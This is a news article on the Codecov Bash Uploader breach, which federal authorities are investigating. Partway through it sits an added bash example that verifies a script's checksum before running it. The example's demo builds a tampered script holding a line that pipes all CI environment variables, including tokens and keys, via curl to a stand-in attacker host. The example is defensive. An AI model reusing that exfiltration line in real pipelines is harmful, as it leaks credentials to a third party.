Codecov breach triggers fears of another SolarWinds-scale attack

The incident is being investigated by US federal authorities


US federal authorities are investigating a security breach suffered by software auditing company Codecov.

According to a statement put out by the San Francisco-based firm, an unauthorized actor broke through its digital defenses and modified its Bash Uploader script, the script customers run inside their build pipelines to upload coverage reports.

While Codecov has emailed all affected users, the nature of the changes to the script potentially puts thousands of customers at risk.


Analysis of the breach suggests the threat actor took advantage of a flaw in Codecov’s Docker image creation process, which allowed them to extract the credential needed to modify the Bash Uploader script.

Another SolarWinds?


Worryingly, it has emerged that the script was tampered with several times and the earliest unauthorized modification dates back to January 31, 2021.

According to reports, the intrusion was not detected until two months later, on April 1, when a customer noticed that the checksum of the script they had downloaded did not match the one Codecov published on GitHub.

In its statement, Codecov warns that any customers that have executed the tampered Bash Uploader script run the risk of losing their credentials, tokens, or keys stored in their continuous integration (CI) environments.
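The checksum comparison that exposed the tampering is the check every consumer of a `curl | bash` style installer should be making before execution. The wrapper below is an added example, not code from the original article or from Codecov's own tooling: it refuses to run a downloaded uploader script unless its SHA-256 matches a checksum obtained out-of-band, and the demo function builds a constructed genuine copy and a constructed tampered copy whose extra line ships the CI environment to a made-up host (`attacker.invalid`, a reserved name that never resolves).

```bash
#!/usr/bin/env bash
# Added example (not Codecov's code): verify a downloaded script against a
# checksum obtained out-of-band before executing it.

# sha256_of FILE -> prints the hex SHA-256 digest (sha256sum on Linux, shasum on macOS)
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# verify_script FILE EXPECTED_SHA256 -> 0 on match, 1 on mismatch (with a message on stderr)
verify_script() {
  local file="$1" expected="$2" actual
  actual="$(sha256_of "$file")"
  if [ "$actual" != "$expected" ]; then
    echo "checksum mismatch for $file: expected $expected, got $actual" >&2
    return 1
  fi
  return 0
}

# run_verified FILE EXPECTED_SHA256 -> executes FILE only if the checksum verifies
run_verified() {
  verify_script "$1" "$2" || return 1
  bash "$1"
}

# demo_tampering -> 0 if the genuine copy runs and the tampered copy is refused.
# Both files and the exfiltration line are constructed for this demo; the
# "expected" digest stands in for a checksum fetched from a separate, trusted channel.
demo_tampering() {
  local good bad expected out
  good="$(mktemp)"; bad="$(mktemp)"
  printf '#!/bin/bash\necho "uploading coverage report"\n' > "$good"
  cp "$good" "$bad"
  # Constructed tampering: post every CI environment variable (tokens, keys) to a third party.
  printf 'env | curl -s --data-binary @- https://attacker.invalid/upload || true\n' >> "$bad"
  expected="$(sha256_of "$good")"

  out="$(run_verified "$good" "$expected")" || { rm -f "$good" "$bad"; return 1; }
  [ "$out" = "uploading coverage report" ] || { rm -f "$good" "$bad"; return 1; }
  # The tampered copy must be refused before a single line of it executes.
  if run_verified "$bad" "$expected" 2>/dev/null; then rm -f "$good" "$bad"; return 1; fi
  rm -f "$good" "$bad"
  return 0
}
```

The important design choice is that the expected digest is pinned by the consumer (in the pipeline definition or a file under version control), not fetched from the same server that serves the script; a checksum published beside the artifact only helps if the attacker could not also rewrite it.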


While Codecov has taken a number of steps to address the breach, the attack has triggered fears of a SolarWinds-scale supply chain attack, primarily because of how long the tampered script remained in use and the size of Codecov’s customer base.

Codecov has announced that a federal investigation into the incident is in progress.

Via Reuters

With almost two decades of writing and reporting on Linux, Mayank Sharma would like everyone to think he’s TechRadar Pro’s expert on the topic. Of course, he’s just as interested in other computing topics, particularly cybersecurity, cloud, containers, and coding.
